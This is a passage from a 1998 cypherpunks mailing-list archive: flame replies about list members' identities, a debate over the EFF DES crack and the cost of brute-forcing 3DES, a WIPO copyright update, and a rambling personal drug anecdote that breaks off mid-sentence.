MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:

> Still, shifting back to media, the five of us in Manhattan --
> Perry, Dimitri, Guy, Duncan (Ray's in Brooklyn -- hundreds
> more don't openly affinity) hate each other's guts with infinite

Not quite.  I've never lived in Brooklyn.  Try again. :)

> Nothing I've seen proves cypherpunks exists: I've seen Ray
> twice and he wasn't the same. I've seen Duncan twice and
> he wasn't the same. Neither recognized me either. We've
> all introduced ourselves to Jim Kallstrom as one another,
> and did the same to several of Kallstrom's stand-ins.

I've seen John Young twice and he was the same.  And IMHO, I've
been the same person as far as I know. :)  IMHO, JYA has seen me
and can recognize me, so I'd say either he's been smoking/drinking
something (or forgot to do so) when posting this, or it's Mr. oToT,
or Dr. V pretending to be JYA.  So yeah, the post I'm replying to
isn't much like JYA.
 
> Mark this: "Perry Metzger" for certain is non-existent, it's only
> a mail drop, a chalk mark, a can by the road, a highly paid
> fictional security scam: Pay or plonk. Cooped cops and
> holed-up criminals do, up the kazoo.

Total Bullshit.  I've seen Perry more than thrice, once at a speech
he gave for the Libertarian Party where Duncan also was, and also
at PC Expo a few years ago, and at a few NYC Cpunx meets.  Perry 
does exist.
 
> I say for a fact the crypto/cypherpunk/cops/spooks game's
> one bird doing a solo dance. Who that bird is, works for,
> remains to be reported reliably: an impossibility by definition.

Nobody gives a rats ass who the TLA spook 'bot, tentacle, or other
happens to be.  We all know and expect that this list is monitored
heavily by many TLA's including the NSA, FBI, and IRS.  There were
several IRS subscribtions to my filtered list a while back.  I guess
they couldn't deal with all the flaming and decided to get info on
the tax evaders without the flames...  I suppose either the NSA and
FBI know enough to have bought AOL or netcom accounts, or read the
list unfiletered.

IMHO, this is a well known fact, and I welcome them on this list.
Let'em sniff all they want, there's very little here that goes on
that isn't considered public knowledge anyway.  Heck, who knows after
reading much of Tim's posts, maybe their points of view will be
swayed and maybe they'll figgure it out for themselves.  Whatever.

> Dimitri was not terminated, can't be, he never was, like the rest
> of us highly classified phantasms. Adam Back got the story
> right, he's exchanging messages with a bot mirroring his inner
> evil, call that Tim, call it Dimitri, he'll call back as the One True
> Terminator you don't want to meet, ever, but will.

IMHO, I've never met Vulis, so I can't say for sure.  It would interesting
if Tim/Dimitry were the same, but I doubt it.  For that to happen, Tim
would need to know a lot about NYC and be here a lot.  Although it would
be possible for Tim (as you propose) to do "Dimitry", from my experiences
of Dimitry, that's highly unlikely.  Dimitry did quite a bit of social
engineering of Earthweb to get info on me.  He also tried several 
attempts at calling me at home and getting info.  There was also an
NYC meeting where someone very suspicious (i.e. almost demented) 
showed up on his behalf, and mentioned lots of stuff about Xenix and
massacres....  

So IMHO, "Vulis" had to be in NYC.  A while back a few folks said they
met him in person.  I'll let them comment on his description.

I will also add that I heavily complained to dm.com's upstream provider
and didn't get too far. It's possible that by the time Guy had complined,
that there were so many complaints against Vulis that psynet decided
to yank the coor.  Or, could be that Guy=Vulis. :)  Whatever.  Either
way I don't give a rats ass.


I've never met Tim, but have spoken with him since the early days of
the Cypherpunks list, back when Vulis didn't exist.  While I'm not
saying that Tim isn't a 'nym, I am saying that he's got far more
reputation capital than Vulis, or Guy.  Based on this, I do not believe
that Tim=Vulis.  Again, that's my belief, and have no evidence for or
against.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 20 Jul 1998 09:53:20 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 20, 1998
Message-ID: <199807201639.LAA14590@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




<FONT COLOR="#000000"
SIZE=2>=============================================
Welcome to today's edition of the CTIA Daily
News
from WOW-COM.  Please click on the icon /
attachment
for the most important news in wireless
communications today.

WIRELESS IT '98, The Next Generation in
Personal
Computing & Communications October
12-14,
Las Vegas, Nevada Call (202) 785-0081 for more
information!
<FONT COLOR="#000000"
SIZE=2>=============================================

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lowry <jlowry@bbn.com>
Date: Mon, 20 Jul 1998 08:51:20 -0700 (PDT)
To: Robert Hettinga <dcsb@ai.mit.edu
Subject: Re: John Gilmore and the Great Internet Snake Drive
In-Reply-To: <v04011738b1d55fa3b8fe@[139.167.130.247]>
Message-ID: <3.0.3.32.19980720114859.009997f0@dave.bbn.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh please ...

As you point out, physics is not optional.  This is predictable and was
predicted.  Yawn.

I predict that 3DES will fall too - actual time it takes is left to the
student.

More interesting, how about a supposition that DNA computers will be able
to factor
interesting numbers within 5 years ?  Does that make certain other
algorithms into snake-oil ?

At the heart of this is the idea that "strong" cryptography is a fixed and
finite
set over time and that a change in that set will result in a change in the
policy restricting export.  It doesn't necessarily follow.  Lobbying is
necessary.

Perhaps all that happens is that DES now joins the crowd of exportable
algorithms :-)

One lesson I plan to observe - don't encrypt known plaintext unless you
have to !

John Lowry

At 04:20 PM 7/17/98 -0400, Robert Hettinga wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Congrats to Mr. Gilmore, EFF, et. al. for a very impressive DES crack.
>
>It seems that Gilmore and Moore's Law have just turned the
>once-respected DES into cryptographic snake-oil. He keeps hurting
>snakes like that, he's gonna get himself canonized. ;-).
>
>
>Seriously. Many thanks to Mr. Gilmore for proving, once again, that
>lobbying is pointless, and that physics is not optional.
>
>Outstanding. Marvellous.
>
>Cheers,
>Bob Hettinga
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGP for Personal Privacy 5.5.5
>
>iQEVAwUBNa+x3cUCGwxmWcHhAQFZAQgArKCN418IA1MXwfpXeJ4IF93j9f3G3skH
>OotWP5dcoHOaUvbgTcOWP9YBAj77jzaazrtfK3wJD634ehLbf5N+gzmBHQVnXtXR
>Vf/JMe24EyI3xCqvRptSTtrik8d+oi3Wy7ZZEwBzLPd0A+XE4LdsClgE2C4ns3ZK
>Lq12mUmRQaZvc4++oakIAOT+Llx9TnnUHYqVMSjDT8QJoJ7vEFBEqcOea1Qzk1u9
>leZlyrLs1ivbhcthXNBOyhN6RTwJgRyF3nFxpl/uY0tEvNvgFl+/aZZTJkwvvhmm
>0MTSfzFfy9I+7BT5FD1iFC+i8JAVd4CDeI+9I6c6/LCAppfrKy5FBg==
>=Zeyp
>-----END PGP SIGNATURE-----
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>The Philodox Symposium on Digital Bearer Transaction Settlement
>  July 23-24, 1998: <http://www.philodox.com/symposiuminfo.html>
>
>For help on using this list (especially unsubscribing), send a message to
>"dcsb-request@ai.mit.edu" with one line of text: "help".
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mkyleen <mkyleen@sturgis.com>
Date: Mon, 20 Jul 1998 11:37:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Persuasive speech topics
Message-ID: <35B38D70.2590@sturgis.com>
MIME-Version: 1.0
Content-Type: text/plain


I can't think of anything fun to do a persuasive speech on, can you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 20 Jul 1998 10:51:22 -0700 (PDT)
To: John Lowry <dcsb@ai.mit.edu
Subject: Re: John Gilmore and the Great Internet Snake Drive
In-Reply-To: <v04011738b1d55fa3b8fe@[139.167.130.247]>
Message-ID: <v0401171eb1d91ca7ac67@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:48 AM -0400 on 7/20/98, John Lowry wrote:


> Oh please ...

Okay, I'll say it again: Yes, Virginia, DES is now officially Snake Oil.

As much snake oil as if someone tried to sell a Ceasar cipher -- a
perfectly good prechristian military messaging technology, mind you :-) --
for use in modern internet financial cryptography.

So, Virginia, DES is DED. Game over. Kaput.

Get used to it.

> As you point out, physics is not optional.  This is predictable and was
> predicted.  Yawn.

Actually my point. It may have been predicted, but it has now happend. DES
is now Snake Oil.

BTW, try getting your gingivitis fixed before you go yawning in someone's
face. ;-).

> I predict that 3DES will fall too - actual time it takes is left to the
> student.

I see. In *your* lifetime? Splendid. I'd love to see *that* happen. And, of
course, *you're* going to do it, Mr. Lowry? Yawn, yourself.

> More interesting, how about a supposition that DNA computers will be able
> to factor
> interesting numbers within 5 years ?

Probably not in your lifetime, bunky, no matter how many 5-gallon buckets
of slime you can grow. Burden of proof's on you, here. My claim that DES is
snakeoil is based on proven fact. Your claim that DNA can economically
factor numbers fast has yet to be demonstrated, and I challenge you to
prove otherwise with a straight face.

> Does that make certain other
> algorithms into snake-oil ?

Anything that is broken, like DES now is, and is still claimed by others to
be safe, and sold by them as such, is, in my book, snake-oil.


> At the heart of this is the idea that "strong" cryptography is a fixed and
> finite
> set over time and that a change in that set will result in a change in the
> policy restricting export.  It doesn't necessarily follow.

No, it doesn't follow, because that's not what I said. I said that because
it is now demonstrably trivial to break DES messages, especially DES
financial messages (the kind with *money* in them, for those in Loma
Linda), DES is now Snake Oil. Just like the Ceasar cipher.

>   Lobbying is
> necessary.

Lobbying is only necessary for those who want to use force to maintain
market share -- geographic, or otherwise. :-). Lobbying itself is the
profession of con men who use the threat of government force to extort
money from people who work, and give it to those who don't, in particular
said con men.

The only way to avoid government's propensity to dynasticize :-) is to
innovate faster than they can regulate. In Loma Linda, they call it
"progress", bunky. And, crypto has just progressed to such a point that
formerly presumed peekware like DES has just been proven to be such, and is
now, quite fairly, snake oil. Moore's law is not optional, At least in
DES's case.

Lobbying is not necessary if you change the world faster than they can
control it. Gilmore, et. al., just proved that.

Lobbying to change the "legal" keysize is a waste of time. Physics causes
economics, which causes law, which causes "policy". It's never the other
way around, regardless of the beltway's daydreams to the contrary.

> Perhaps all that happens is that DES now joins the crowd of exportable
> algorithms :-)

I would claim that, your disengenous ":-)" aside (yeah, I know, pot,
kettle, black), that any "exportable" algorithm is in fact snake oil. And
Gilmore just proved it.

> One lesson I plan to observe - don't encrypt known plaintext unless you
> have to !

Wha? Security through obscurity? How exactly can you encrypt a message you
don't know the contents of?

Oh. I get it. Statist humor. (Yeah, I know about blinding, I just hate
sophistry...)

Feh.

Cheers,
Bob Hettinga

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The Philodox Symposium on Digital Bearer Transaction Settlement
  July 23-24, 1998: <http://www.philodox.com/symposiuminfo.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 20 Jul 1998 10:32:50 -0700 (PDT)
To: rdl@mit.edu
Subject: 3DES weak because DES falls to brute-force? (was Re: John Gilmore...)
Message-ID: <199807201732.NAA25239@denmark-vesey.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[recipients list trimmed somewhat]

I think it is always reasonable to be cautious, but there is a point where
overcautiousness is counterproductive.  Believing 3DES weak because DES is 
so strong that it has thusfar withstood more analysis than any other
cipher and only falls to brute force is, I believe, one of these cases 
of excessive paranoia.

Assumptions:
* Brute forcing DES with a 56-bit key took $50k in materials in today's money.
* 3DES with 3 keys is strong enough to resist everything weaker than
a 112-bit brute force attack (due to the meet-in-the-middle attack)
* Physics, as you say, is not optional.
* The notation 2**56 is two raised to the fifty sixth power.

At first approximation, doing the same thing to a 112bit 3DES problem would
require 2**56 more chips. and thus 2**56 more money, to do in the same amount 
of time.  My copy of gnu bc tells me this is "3602879701896396800000", or
three and a half sextillion dollars.  This is more than a billion times the
current world industrial output.

This is somewhat of a naive calculation, though.  Those chips were not
ideal.  There's a general rule about chips doubling in transistor count (and
for this application, performance) every 1.8 years.  Assuming this
rate of improvement, and let's say a random factor of a million for better
design, and a fabrication improvement rate (due to buying all your
raw-materials suppliers, them becoming more efficient, etc.) which together
with Moore's law doubles performance every year (mostly for ease of 
calculation).

Let's assume the target is to be able to complete the calculation within
ten centuries.  It is better to wait until this is possible before
starting than to start and run a calculation for a billion years waiting for
it to catch up, as few things are of value that far in the future, and also
there is the time value of money to worry about.

Let's also place a budget cap of $20t US today's money on the problem at
the start of calculation.

(2**56)*50000/1000000 	== 3602879701896396 dollars today
1000*365/3 		== 121660 gilmore-kocher periods in a 1000 years
3602879701896396/121660 == 2961433258175568 dollars today to crack in 1000 
years
log(2,2961433258175568) == slightly more than 51 years

So, this *highly* optimistic calculation says that even if we are willing to
assume an *incredible* performance speedup due to better technology and
vertical integration that continues unabated (and exceeds reality), *and*
we're willing to wait 1000 years for our answer, *and* are willing to spend
$20t to build the machine, it is at least 51 years before you should start.

This also doesn't take into account the incredible power consumption of
such a machine -- about half a million times more than the gilmore-kocher
machine.  I assume their chips drew 5 watts each -- it would need 3 GW, which
is a major nuclear facility with multiple reactors.  Cost of power is *not*
going down, so it's about $250 billion dollars a year in electricity, for
1000 years.

This doesn't take into account the potential for a "technology refresh"
throughout the 1000 year calculation period.  It's a long enough period of
time to make this significant.

I'd say the odds of an analytic attack against DES or a fundamental 
breakthrough
in quantum computing or something in 50 years, let alone 1050 years, are
far higher than the chances anyone would go through this much trouble.

While I agree that data intended to remain secure should be secured with
something other than 3DES, it is for the potential of a breakthrough in 
algorithms, not speedup in brute force techniques, which is worrisome.  Brute
force techniques are basically public knowledge.  A secret analytic 
breakthrough, however, could be completely black.  The solution some people
have come up with is multiple ciphers used in such a way as to be as strong
as the strongest link.  The increase in keysize is not a major issue for 
something intended to last this long.

If you can get a cipher which has as its weakest point a brute force attack,
you have won.  If you can get a *system* which has as its weakest point a brute
force attack on a 112 bit key, you've probably killed everyone in the world 
already several times over in a preemptive strike, especially everyone who 
ever had any knowledge of the keys or data.  Humint, monitoring hardware, etc. 
are
far more appealing than a brute force attack against any real system.
-- 
Ryan Lackey
rdl@mit.edu
http://sof.mit.edu/rdl/		






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Corvus Corvax" <corvuscorvax@hotmail.com>
Date: Mon, 20 Jul 1998 13:39:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Request To Be Phlamed
Message-ID: <19980720203908.28197.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



> What some of them seem to want would appear to be _me_ (and you).

Only because you'd look so absolutely luscious in leather, darling. 


Kiss kiss, 

Diva! von Future Prime

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 20 Jul 1998 11:16:12 -0700 (PDT)
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: 3DES weak because DES falls to brute-force? (was Re: John Gilmore...)
In-Reply-To: <199807201732.NAA25239@denmark-vesey.MIT.EDU>
Message-ID: <199807201816.OAA25266@denmark-vesey.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Sigh.  One should not do math before coffee.

Let's try this again:
If you assume 2^56 requires $50k and 3 days, and are willing to take
2^8 times longer and spend 2^16 times more, and want to break a 2^112 bit
key, and assume technology doubles in performance for this particular
operation per year, then the calculation is easy to do.

112 - 56 - 16 - 8 = 32

If you wait 32 years, and have *incredible* performance gains in excess of
what we have now (but which I think could be possible for worst-case crypto
breaking chips, since they have relatively little in the way of communication,
and have small units), and have a budget of 16 times what the DES cracker
had (about $3b, which is totally reasonable), and are willing to wait about
2 years, you can brute force 3DES in the year 2030.

There is still very little that is relevant in 32 years, and there is still
a far better chance that some analytic attack will be discovered, a fundamental
breakthrough in computation will happen, etc. before that time.

112 bits is below the "physical impossibility" point as far as key size goes
(I like the calculation based on free energy in the universe in Applied 
Crypto).
Chapter 7 in Applied Crypto is probably a far better analysis than mine,
especially as it includes the caveat emptor section.

Perhaps it is correct, "It's time to bring on those 128, 192, and 256-bit 
keys",
at least for some systems, although I'd definitely prefer multiple ciphers
separately keyed with long keys than n-DES for such long-term use.

Calculating future key lengths really *is* a losing game.
-- 
Ryan Lackey
rdl@mit.edu
http://sof.mit.edu/rdl/		






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BUFFU@aol.com
Date: Mon, 20 Jul 1998 11:39:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Nomination of Lyndon Larouche to the UNITED NATIONS OF THE FRINGE
Message-ID: <267b60e9.35b38e90@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


        Hey Punks,
            As a United Nations OF the Cyber Fringe Member,  I am asking for
your input on giving Lyndon a nomination.  So far his war crimes only include
insanity and stupidity.  Being as Presidential elections will be coming in the
next few years, and I can't vote for my granpa again because he died.  And
Captain Kangaroo and Mr. Green Jeans arn't interested in being endorsed by
anyone, that leaves us without a candidate.  If we vote in Lyndon and his
crew, we would have gophers during our UN meetings.  I'm trying to get a web
page for the UNOCF but until then I'm winging it.  Consult all your Homies and
let me know.

              Sincerely,

                 Beth 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Mon, 20 Jul 1998 12:17:07 -0700 (PDT)
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: 3DES weak because DES falls to brute-force? (was Re: John Gilmore...)
In-Reply-To: <199807201732.NAA25239@denmark-vesey.MIT.EDU>
Message-ID: <Pine.LNX.3.96.980720145402.20197A-100000@ismene>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 Jul 1998, Ryan Lackey wrote:

> So, this *highly* optimistic calculation says that even if we are willing to
> assume an *incredible* performance speedup due to better technology and
> vertical integration that continues unabated (and exceeds reality), *and*
> we're willing to wait 1000 years for our answer, *and* are willing to spend
> $20t to build the machine, it is at least 51 years before you should start.

Humrph .. your calculations came in just before I was gonna send mine out
.. bc is a nice utility, ain't it? :)

> While I agree that data intended to remain secure should be secured with
> something other than 3DES, it is for the potential of a breakthrough in 
> algorithms, not speedup in brute force techniques, which is worrisome.

Well, I disagree here.. unless the "something other than 3DES" is an OTP,
of course. I don't see anything that looks better than DES, minus the
key-size issue. DES has had the fiercest analysis done on it for the
longest amount of time. If we are worried about a breakthrough in
the algorithmics, then it seems to me we ought to use DES based on the
fact that it has been analyzed longer, and has proved itself strong.

We've covered the new vs. old algorithm debate here recently, so I'll
shut up.. suffice it to say, I fall in line with the 'old' school.

I don't find it useful to worry about possible new general cryptanalytic
breakthroughs: it is basically impossible to defend against them. In
the face of an attacker who has infinite secret cryptanalytic ability 
(within the bounds of what can be done brute-force wise) only an OTP
would be useful, but we are talking long-term archival here.. I don't
see how an OTP helps us. If we have a secure vault to lock the pads up
in until either a) the heat death of the universe, or b) the Big Crunch
then we may as well just put the plaintext in there and be done with
it. As I see it, OTP are only workable in communications, and then
obviously in a limited manner.


Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
I think that we should be men first, and subjects afterward. It is not
desirable to cultivate a respect for the law, so much as for the right.
			Henry David Thoreau "Civil Disobedience"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 20 Jul 1998 12:15:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: More on WIPO Copyright Amendment
Message-ID: <199807201915.PAA03490@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


To amplify the earlier NY Times report on the July 17
passage of the Krug amendment to the WIPO copyright act, 
which once banned encryption analysis, Reuters today says:

  The committee also approved an amendment allowing 
  cryptography researchers to crack anti-piracy safeguards 
  as part of their work. And an amendment was added 
  allowing Internet users to disable such measures to 
  prevent the collection of personal information.    

The Reuters report:

  http://jya.com/wipo-hit2.htm

-----

Thanks to DM.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Waters <waters@ultimateprivacy.com>
Date: Mon, 20 Jul 1998 13:24:01 -0700 (PDT)
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: 3DES weak because DES falls to brute-force? (was Re: John Gilmore...)
In-Reply-To: <199807201732.NAA25239@denmark-vesey.MIT.EDU>
Message-ID: <199807202023.QAA08696@omniwork.com>
MIME-Version: 1.0
Content-Type: text/plain



>I don't find it useful to worry about possible new general cryptanalytic
>breakthroughs: it is basically impossible to defend against them. In
>the face of an attacker who has infinite secret cryptanalytic ability 
>(within the bounds of what can be done brute-force wise) only an OTP
>would be useful, but we are talking long-term archival here.. I don't
>see how an OTP helps us. If we have a secure vault to lock the pads up
>in until either a) the heat death of the universe, or b) the Big Crunch
>then we may as well just put the plaintext in there and be done with
>it. As I see it, OTP are only workable in communications, and then
>obviously in a limited manner.
>

Are we talking long-term archival?  I'm more concerned about someone
grabbing communications in transit, storing them and throwing chips and
mathematicians at it.

If the government comes with the search warrant, then I should have already
deleted the file if I didn't want it available.  If someone wants to face
security guards or a gun by my bedside they can steal the archive.  It's
the same rules as always. (except the theif must also have the math and
chips).

In the case of archive you have the protection of physical security and in
most cases the knowledge of when it has been breached -- It's a lot
friendlier than in communications where who knows what is going on between
the sender and recipient.

OTP is a pain, and is not effective for archival -- but it is the only way
I've seen to protect communications in excess of ~30 years.

Bryan Waters                                    http://www.ultimateprivacy.com
Director of Marketing                    Voice: 512-305-0505 Fax: 512-305-0506
Ultimate Privacy Corporation       3925 W Braker Ln #305, Austin, TX, 78759  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kawika Daguio" <KDAGUIO@aba.com>
Date: Mon, 20 Jul 1998 12:40:58 -0700 (PDT)
To: rdl@mit.edu
Subject: Re: 3DES weak because DES falls to brute-force? (was Re: JohnGilmore...)
Message-ID: <s5b36475.040@aba.com>
MIME-Version: 1.0
Content-Type: text/plain


If you listen to those in the exploitation community you might hear that 3DES provides less comparable security relative to DES than you know or have stated.    Either way, however, it is more than sufficiently strong to secure any kind of traffic one might contemplate sending over a network.  3DES should work for a while, but I would prefer something more elegant and efficient.

We have pushed 3DES forward as an interim standard, and are moving 3DES out into the world and the AES (128 and 256) forward to provide us another long-term solution.   We told NIST that we hoped the AES could serve as a 20-30 year solution and are pushing algorithm agnostic standards to avoid similar obstacles to a transition in the far off future.

One of the reasons we so aggressively pursued the negotiations over export control with the Administration and have pushed the AES, and our PKI is the collateral damage from the export control legislative debate.   When the AES is finalized it will be followed closely by  an ANSI X9 standard.  Once these standards and infrastructure are established, the concerns about brute force attacks should be largely behind us.

kawika
daguio

my views only

>>> Ryan Lackey <rdl@MIT.EDU> 07/20/98 02:16PM >>>
Sigh.  One should not do math before coffee.

Let's try this again:
If you assume 2^56 requires $50k and 3 days, and are willing to take
2^8 times longer and spend 2^16 times more, and want to break a 2^112 bit
key, and assume technology doubles in performance for this particular
operation per year, then the calculation is easy to do.

112 - 56 - 16 - 8 = 32

If you wait 32 years, and have *incredible* performance gains in excess of
what we have now (but which I think could be possible for worst-case crypto
breaking chips, since they have relatively little in the way of communication,
and have small units), and have a budget of 16 times what the DES cracker
had (about $3b, which is totally reasonable), and are willing to wait about
2 years, you can brute force 3DES in the year 2030.

There is still very little that is relevant in 32 years, and there is still
a far better chance that some analytic attack will be discovered, a fundamental
breakthrough in computation will happen, etc. before that time.

112 bits is below the "physical impossibility" point as far as key size goes
(I like the calculation based on free energy in the universe in Applied 
Crypto).
Chapter 7 in Applied Crypto is probably a far better analysis than mine,
especially as it includes the caveat emptor section.

Perhaps it is correct, "It's time to bring on those 128, 192, and 256-bit 
keys",
at least for some systems, although I'd definitely prefer multiple ciphers
separately keyed with long keys than n-DES for such long-term use.

Calculating future key lengths really *is* a losing game.
-- 
Ryan Lackey
rdl@mit.edu 
http://sof.mit.edu/rdl/		







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 20 Jul 1998 16:49:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: If You Think I'm Crazy Now... - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C977E.807CD340.3@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


If ou Think I'm Crazy Now
ou Should Have Seen Me When
I Was A Kid
~Geezinslaw Brothers
SPACE ALIENS HIDE M DRUGS!!!
_____________________________


From:   MX%"chrisharwig@hetnet.nl"  "kryz"
To:     MX%"bleed@west.cscwc.pima.edu"
Subj:   Re: Leftist Nutly News - SPACE ALIENS HIDE M DRUGS!!!

I think you're a bit out of line. Wish you well and all of that. 
Strength that is.

----------

  A "bit" out of line?
  I'm trying to be *way* out of line, but I guess I'm a failure
at that, too <sigh>.


  Children of the 60's can all remember where they were when they
heard about JFK being shot. Many of them can remember where they
were when they bought their first pound of pot, and most of them
can remember where they were when they sold their first pound of
pot (particularly if they got busted in the process.)
  I bought my first pound of pot in a public park in Edmonton,
Alberta. I needed to sell it to get the money to pay a fine for
drug possession, and I couldn't, in good conscience, pay it with
money that I'd earned by working for a living at my regular job.
  Let me explain...

  It was the summer of 1969...

 [Debitor's Bad Note: If 90% of the events in the Author's life
  seem to have somehow occurred in 1969, this might be the result
  of the massive electroshock and hypnosis treatments HeOrSheOrIt
  underwent under the...care...of an MKULTA physician in Saskatoon,
  Saskatchewan, Abram Hoffer, who undoubtedly appears as only a
  minor, peripheral figure, if at all, in most literature on the
  subject...likely as a result of great care being taken by shadowy
  background figures to keep him out of the limelight, ala Kim 
  Philby, due to the fact that the record of his 'personal history'
  seems to be unable to withstand close scrutiny once one begins to
  investigate the time periods preceding the end of WWII.
  Hhhmmmm...]

  Quit interrupting, Dogamnnit!

  Anyway, I was working in orkton, Saskatchewan and living with a
sixteen year old high school student with no parents, no job, no
source of income, who always paid his share of the rent, and always
had better clothes and more spending money than me. [It turned out
that he had two motto's in life. 1)Everything that isn't nailed down,
is mine. 2)Anything I can pry loose, isn't nailed down...]
  The apartment we shared tended to be a hang-out for a variety of
local high-school kids, who would invariably bring by any interesting
characters passing through town on the couch circuit, who needed a
place to crash for the night. One of these characters was Frank
Skanks, an older fellow.

  The drug scene in orkton was basically a Virtual Drug Scene, where
most people knew somebody who knew somebody who had once copped a
bag of weed on a trip with their parents to Vancouver, and shared
it with a few close friends on their return.
  Upon Franks arrival, however, things picked up, and a few of the
local kids suddenly seemed to have access to a fair amount of smoking
dope. There even seemed to be some acid floating around.

  I returned home one evening to find a bottle of wine in the fridge,
and had several large glasses before 'the gang' returned from a trip
to the Dairy Queen, whereupon they became dismayed to find that I
had consumed such a large portion of a concoction they had prepared
in accordance with Ken Kesey's directions in 'The Electric Kool-Aid
Acid Test.'
  That seemed to explain the fact that I was able to pick up Messages
>From Mars through the fillings in my teeth, which I had always had
trouble doing before...

  I found it to be a fairly pleasant experience, even though I did
feel a slight bit of guilt, knowing that I had inadvertantly setback
the plans of a dozen or so people who had hoped to get high with the
portion of Dr. Skank's Magic Elixir which I had unwittingly consumed.
  I didn't mind being 'dosed,' since I had already figured on trying
LSD on the proverbial SomeDay. When my enlightened reverie was
interrupted, however, by the sight of Frank Skanks teaching a group
of thirteen-to-fifteen year olds how to tie-off and shoot up, my
pleasant experience took on a rather sour note.
  When my efforts to put a stop to the proceedings failed, largely
due to the rush of young children knocking me down in order to get
a good place in the line that was forming, waiting for Frank to find
one of his few remaining good veins, I decided that, in the interests
of saving at least a single child, I would  call on Dudley DoRight 
for help.

  I walked to the local RCMP station, dodging the dinosaurs and 
hobbits which seemed to be everywhere, in a multitude of colors,
and proceeded to inquire as to whether they might be interested
in helping to postpone a group of young teenagers' entry into the
world of needles and spoons and basement rooms until a later age,
when they might be in a position to make better judgements in that
regard.
  After throwing me in a jail cell, and grabbing a wide variety of
heavy weaponry, a quickly assembled RCMP assault force rushed out
the door, to 'save the children.' I had the uneasy feeling that they
were intent on saving them even if it meant killing them.

  I didn't get any sleep that night, undoubtedly as a result of the
fact that I was 'tripping for twelve,' and I could hear a lot of
muffled, semi-legible conversations taking place on the far side
of the walls, or door. They didn't seem to make sense, and I assumed
that it was because of my temporary residence of planets of another
galaxy.
  The clearest verbal communication I heard, as the door to the jail
cells was opened, was, "Wrong door!"
  I don't know who spoke those words, but I imagine that it was one
of the Mounties in the company of Frank Skanks, who was staring at
me with extremely wide eyes, and with excrement obviously filling his 
shorts in less time that it take to utter, "Can you say *cop*! Sure 
you can..."

  I was totally dumbfounded, as well as still extremely wasted, but
I still managed to smile, and say, "Nice suit, Frank." before the
door closed and the conference which had apparently just broken up
was quickly reconvened.

  Being young and naieve, I thought that this was the end of the
story, an interesting story I would someday be able to tell my
grandchildren, after DNA testing showed my denials of paternity to
be outright lies.
  What I didn't understand, at the time, was that my surprise at
finding that the Great Canadian Hero, Dudley DoRight, was somehow
involved in something which seemed to run contrary to the Official
Movie Mythology, would soon be supplanted by total incredulity that
the spot of shit I had observed on the end of Dudley's Dick would
soon prove to be a massive amount of shit covering the RCMP members'
